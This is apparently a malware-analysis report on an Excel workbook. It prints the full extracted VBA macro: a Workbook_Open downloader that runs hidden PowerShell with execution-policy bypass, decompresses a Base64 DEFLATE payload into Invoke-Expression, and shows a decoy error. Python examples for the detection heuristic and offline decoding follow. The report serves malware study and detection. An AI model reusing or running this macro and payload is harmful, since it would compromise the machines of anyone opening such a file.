Verdict: MALICIOUS
Risk Score: 316

Heuristics (7)

- ClamAV: Doc.Downloader.Generic-6698329-0 (critical, CLAMAV_DETECTION)
  ClamAV detected this file as malware: Doc.Downloader.Generic-6698329-0
- VBA project inside OOXML (medium, OOXML_VBA; 5 related findings)
  Document contains a VBA project: VBA macros present.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL)
  Matched line in script: `Shell exec, vbHide`
- PowerShell reference in VBA (critical, OLE_VBA_PS)
  Matched line in script: `Command = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
  Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) and a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; the pairing is what flags p-code-only or source-extraction-failure macro documents, where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Workbook_Open macro (low, OLE_VBA_WBOPEN)
  Matched line in script: `Private Sub Workbook_Open()`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
  Matched line in script: `Arch = Environ("PROCESSOR_ARCHITECTURE")`
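The pairing rule described above can be reproduced in a few lines. This is an added example, not the analyzer's own rule implementation: it scans a stream's text for the two token families named in the rule description and fires only when both are present, so an auto-open macro with no execution token and a Shell call with no entry point both stay quiet. The three input streams are constructed for the demonstration (the first reassembles the matched lines this report shows); on a real p-code-only document the text would have to come from strings recovered from the compiled stream, which this example does not do.

```python
# Added example (not the analyzer's code): token-pair heuristic in the spirit
# of OLE_VBA_PCODE_AUTOEXEC_EXEC. Fires only when an auto-exec entry point AND
# an execution/download token occur in the same stream text.
import re

# Token lists as given in the rule description above.
AUTOEXEC = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
            "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def _hits(text: str, tokens) -> list:
    """Whole-token, case-insensitive matches (VBA identifiers are case-insensitive).
    'Shell' must not match inside 'ShellExecute' or 'windowspowershell', but
    'WScript.Shell' and '\\powershell.exe' must match, hence \\w-only lookarounds."""
    found = []
    for tok in tokens:
        if re.search(r"(?<!\w)" + re.escape(tok) + r"(?!\w)", text, re.IGNORECASE):
            found.append(tok)
    return found


def score_stream(stream_text: str) -> dict:
    """Return the pairing verdict plus the tokens on each side that produced it."""
    auto = _hits(stream_text, AUTOEXEC)
    execs = _hits(stream_text, EXEC_TOKENS)
    return {"fires": bool(auto and execs), "autoexec": auto, "exec": execs}


# Constructed streams (not carved from the sample):
#  - the report's own matched lines reassembled into one stream
#  - a benign auto-open macro with no execution token
#  - a Shell call in a helper with no auto-exec entry point
REPORT_LIKE = ('Private Sub Workbook_Open()\n'
               'Command = windir + "\\syswow64\\windowspowershell\\v1.0\\powershell.exe"\n'
               'Shell exec, vbHide\n'
               'End Sub\n')
BENIGN_AUTOOPEN = 'Sub Auto_Open()\nRange("A1").Value = Now\nEnd Sub\n'
NO_ENTRY_POINT = 'Sub Helper()\nShell "calc.exe", vbHide\nEnd Sub\n'

if __name__ == "__main__":
    for name, text in (("report-like", REPORT_LIKE),
                       ("benign auto-open", BENIGN_AUTOOPEN),
                       ("no entry point", NO_ENTRY_POINT)):
        print(name, score_stream(text))
```

The `exec` list in the verdict is what the report calls the "detail line": for the report-like stream it names `Shell` and `PowerShell`, which is exactly the pairing with `Workbook_Open` that the high-severity finding above describes.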
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3420 bytes | 5df6f40d16866d092013f652b99dfce1ad507901391907967d7a289809dfd396 |
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 24576 bytes | 36e2d11701e78e3c0f9e8598f436ca51671f5572096e9e69e28e13430f745cab |

Detection for vbaProject_00.bin: ClamAV Doc.Downloader.Generic-6698329-0. Obfuscation or payload: unlikely.

Preview of macros.bas (first 1,000 lines of the extracted script; the two modules below are far shorter than that, so the preview is the complete extracted source):

```vb
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim Command As String
Dim str As String
Dim exec As String
Arch = Environ("PROCESSOR_ARCHITECTURE")
windir = Environ("windir")
If Arch = "AMD64" Then
Command = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
Else
Command = "powershell.exe"
End If
str = "7VZNj9s4DL3nVwiBDwnGHsiSZY8bDNAvFCiwWCwwg+0hyMGW5R2jjh"
str = str + "M4TjfT7v73NalQHmWmRdHzXmhLpB4fKYpSoNktez2frd+37c"
str = str + "ftftcPi/ln03emleK6atv5csP2x7JtNDsMxTB+zGkY9exjN/"
str = str + "wx9OzPph+ORfumbXd6cZ77O2THphvY6fx9PH+/Lle/7Oddb4"
str = str + "rB3D+Mn4r8HM+4X0I2eT7/PfF9nrn0vj180f3wM763Znsww+"
str = str + "I5sotq/noW7MZEvqmq6P5xb1g0rilN/97UTdcMza5jgWbR78"
str = str + "XWsPmnppNizqJuHB32hTYMZz4cOw2WBxbti8NheOiPs+B0G+"
str = str + "xevfKSzEN+ijmHj7SfhC9XbP32cTDrzSY4wI7yU61HjbkZxU"
str = str + "0+CjScRMpJYRQAxaOoBCgSUJSjUAI9eEOuvWHsjDMYCvDG61"
str = str + "GUGdAqYC4l+LqmPw2gBUBJECnMZfDHEQX+BJhoNIZlvAKBQ0"
str = str + "A2YFdzoqEyn5XjnAjygWurSQF/GSZHEaEsIc6TsZpWgHF84x"
str = str + "zdEElrLIGVJG9JTnbSZcja/TAb341XgjeDJIFuDaAcvGVgV4"
str = str + "NWljQUCdlhmtQF58TjnKaOHxIvPeNYe8bW7iIiV0hJQvAoVE"
str = str + "kC91eBiYLsKhc+RoSOVE1aRI6BuEEuwE9BWCnYpQaEot2ypQ"
str = str + "yKDNKU5s4EvSWkTTSZYDnyjBhUmCbMkH8+7LlCv2CXFQ5eOw"
str = str + "FxCNxGQBHgF48LlgWehVQSQApQGadlyN7iCYenaBuFc64kVV"
str = str + "OiSCFzz9u0Ql3kIHHsQZFJh2woORYv/R4eFpJwoAmRRHgM4c"
str = str + "XwXbuxW/u/+AVh8weZnLoF7u+lAC3WuMSzBXuZwbLiosZLUu"
str = str + "CRtI0nJwCLgq1P+nPu/hBx+PRoYGEqd/xsBwa7HFzq9LlzLP"
str = str + "QpIrxssF2nLl5s//ZmSkj7RMTuz/lFZDXVX+n5RULab7kvJj"
str = str + "ElPIF9F4bY6rMLvIu7IvGQUVunpLV9EhjUOTHlOTkqINl6at"
str = str + "LVC8TdBtizj+Ebz2Wlwmex2W10tYGxTQkrXdDYfLkfYFnTVg"
str = str + "j3x13PwasIYyu15xdji91OY7/CpprnZDIJRMYty9wFpBLPGz"
str = str + "LF670Eu0JQHBNTjDJxxtw+ip6jPGnmU+1mpMWjVmCt4QWuPB"
str = str + "+5JAUK+1rKPADu+v3l0XAlhXdZnjoA8aOS0lAH9nIFH/YFIH"
str = str + "07RUyRPWox2dKd+EnYawfzjN0b7wVJc/ZKcHPTRcX5albver"
str = str + "YImlu+ChoWtWYcHPT1b6b7a3iI4uU4e3W1ZN/geXp+H6/tA3"
str = str + "mzCE7X97txIMVieRU0y5CNS9dBswlZvGT/sN1xiLpj267+nQ"
str = str + "Vf8YHrve7HKMPgFMIHHrZ3Q9EP0V1rzJ5Fd0bvuorB+5fz/w"
str = str + "A="
exec = Command + " -Exec Bypass -Comm"
exec = exec + "and ""Invoke-Expression $(New-Object IO.StreamRea"
exec = exec + "der ($(New-Object IO.Compression.DeflateStream ("
exec = exec + "$(New-Object IO.MemoryStream (,$([Convert]::From"
exec = exec + "Base64String(\"" " & str & " \"" )))), [IO.Compr"
exec = exec + "ession.CompressionMode]::Decompress)), [Text.Enc"
exec = exec + "oding]::ASCII)).ReadToEnd();"""
Shell exec, vbHide
'Variable Declaration
Dim OutPut As Integer
'Example of vbCritical
OutPut = MsgBox("Document not compatible with this Office version", vbCritical, "Compatible Error")
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```
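The Workbook_Open handler above stages its second-stage PowerShell as a Base64 string of a raw DEFLATE stream, picks the 32-bit PowerShell host under SysWOW64 when PROCESSOR_ARCHITECTURE is AMD64 (a common choice when the next stage is 32-bit code), launches it hidden with `-Exec Bypass`, and then shows a decoy "Document not compatible" error. The following is an added example, not part of the report or of oletools, that reconstructs the `str` blob from the `str = str + "..."` lines shown in the preview and inflates it the same way the PowerShell one-liner does (System.IO.Compression.DeflateStream is raw DEFLATE, which zlib handles with a negative window size), without executing anything. The constructed stage-2 text used for the round-trip self-check, the helper names and the regex are mine; the blob itself is copied from the preview, and whether it inflates cleanly is attempted rather than asserted.

```python
# Added example (not the report's or oletools' code): rebuild the macro's
# staged blob and inflate it offline, mirroring the PowerShell one-liner
# FromBase64String -> DeflateStream(Decompress) -> ASCII without running it.
import base64
import re
import zlib

# Constructed stand-in for a stage-2 script, used only for the round-trip self-check.
SAMPLE_STAGE2 = b"Write-Host 'constructed stage two'; Start-Sleep 1\n"

# The `str` concatenation lines exactly as they appear in the macros.bas preview above.
VBA_STR_LINES = r'''
str = "7VZNj9s4DL3nVwiBDwnGHsiSZY8bDNAvFCiwWCwwg+0hyMGW5R2jjh"
str = str + "M4TjfT7v73NalQHmWmRdHzXmhLpB4fKYpSoNktez2frd+37c"
str = str + "ftftcPi/ln03emleK6atv5csP2x7JtNDsMxTB+zGkY9exjN/"
str = str + "wx9OzPph+ORfumbXd6cZ77O2THphvY6fx9PH+/Lle/7Oddb4"
str = str + "rB3D+Mn4r8HM+4X0I2eT7/PfF9nrn0vj180f3wM763Znsww+"
str = str + "I5sotq/noW7MZEvqmq6P5xb1g0rilN/97UTdcMza5jgWbR78"
str = str + "XWsPmnppNizqJuHB32hTYMZz4cOw2WBxbti8NheOiPs+B0G+"
str = str + "xevfKSzEN+ijmHj7SfhC9XbP32cTDrzSY4wI7yU61HjbkZxU"
str = str + "0+CjScRMpJYRQAxaOoBCgSUJSjUAI9eEOuvWHsjDMYCvDG61"
str = str + "GUGdAqYC4l+LqmPw2gBUBJECnMZfDHEQX+BJhoNIZlvAKBQ0"
str = str + "A2YFdzoqEyn5XjnAjygWurSQF/GSZHEaEsIc6TsZpWgHF84x"
str = str + "zdEElrLIGVJG9JTnbSZcja/TAb341XgjeDJIFuDaAcvGVgV4"
str = str + "NWljQUCdlhmtQF58TjnKaOHxIvPeNYe8bW7iIiV0hJQvAoVE"
str = str + "kC91eBiYLsKhc+RoSOVE1aRI6BuEEuwE9BWCnYpQaEot2ypQ"
str = str + "yKDNKU5s4EvSWkTTSZYDnyjBhUmCbMkH8+7LlCv2CXFQ5eOw"
str = str + "FxCNxGQBHgF48LlgWehVQSQApQGadlyN7iCYenaBuFc64kVV"
str = str + "OiSCFzz9u0Ql3kIHHsQZFJh2woORYv/R4eFpJwoAmRRHgM4c"
str = str + "XwXbuxW/u/+AVh8weZnLoF7u+lAC3WuMSzBXuZwbLiosZLUu"
str = str + "CRtI0nJwCLgq1P+nPu/hBx+PRoYGEqd/xsBwa7HFzq9LlzLP"
str = str + "QpIrxssF2nLl5s//ZmSkj7RMTuz/lFZDXVX+n5RULab7kvJj"
str = str + "ElPIF9F4bY6rMLvIu7IvGQUVunpLV9EhjUOTHlOTkqINl6at"
str = str + "LVC8TdBtizj+Ebz2Wlwmex2W10tYGxTQkrXdDYfLkfYFnTVg"
str = str + "j3x13PwasIYyu15xdji91OY7/CpprnZDIJRMYty9wFpBLPGz"
str = str + "LF670Eu0JQHBNTjDJxxtw+ip6jPGnmU+1mpMWjVmCt4QWuPB"
str = str + "+5JAUK+1rKPADu+v3l0XAlhXdZnjoA8aOS0lAH9nIFH/YFIH"
str = str + "07RUyRPWox2dKd+EnYawfzjN0b7wVJc/ZKcHPTRcX5albver"
str = str + "YImlu+ChoWtWYcHPT1b6b7a3iI4uU4e3W1ZN/geXp+H6/tA3"
str = str + "mzCE7X97txIMVieRU0y5CNS9dBswlZvGT/sN1xiLpj267+nQ"
str = str + "Vf8YHrve7HKMPgFMIHHrZ3Q9EP0V1rzJ5Fd0bvuorB+5fz/w"
str = str + "A="
'''

# Matches `str = "..."` and `str = str + "..."`; the captured group is the literal.
CONCAT_RE = re.compile(r'^\s*str\s*=\s*(?:str\s*\+\s*)?"([^"]*)"\s*$', re.M)


def rebuild_concat(vba_source: str) -> str:
    """Join the string literals of the concatenation chain in source order."""
    return "".join(CONCAT_RE.findall(vba_source))


def inflate_stage(b64: str) -> bytes:
    """Base64-decode, then raw-DEFLATE inflate (wbits=-15: no zlib/gzip header)."""
    return zlib.decompress(base64.b64decode(b64, validate=True), wbits=-zlib.MAX_WBITS)


def deflate_stage(plain: bytes) -> str:
    """Inverse of inflate_stage; produces a blob in the same format the macro carries."""
    c = zlib.compressobj(level=9, wbits=-zlib.MAX_WBITS)
    return base64.b64encode(c.compress(plain) + c.flush()).decode("ascii")


def deflate_header(b64: str) -> dict:
    """Peek at the first DEFLATE block header without inflating:
    BFINAL is bit 0, BTYPE is bits 1-2 (0 stored, 1 fixed, 2 dynamic Huffman)."""
    raw = base64.b64decode(b64, validate=True)
    return {"size": len(raw), "bfinal": raw[0] & 1, "btype": (raw[0] >> 1) & 3}


def decode_report_payload():
    """Stage-2 bytes from the preview's blob, or None if the blob does not inflate."""
    try:
        return inflate_stage(rebuild_concat(VBA_STR_LINES))
    except (ValueError, zlib.error):
        return None


if __name__ == "__main__":
    blob = rebuild_concat(VBA_STR_LINES)
    print("base64 length:", len(blob), "deflate header:", deflate_header(blob))
    stage2 = decode_report_payload()
    print(stage2.decode("ascii", "replace") if stage2 else "blob did not inflate")
```

The header peek is a cheap sanity check before inflating: the preview's 1,400 Base64 characters decode to 1,049 bytes whose first byte has BFINAL set and BTYPE = 2 (a single dynamic-Huffman block), which is what a compact, finished DeflateStream output looks like. Treat whatever inflates as hostile text and read it, never pipe it to PowerShell.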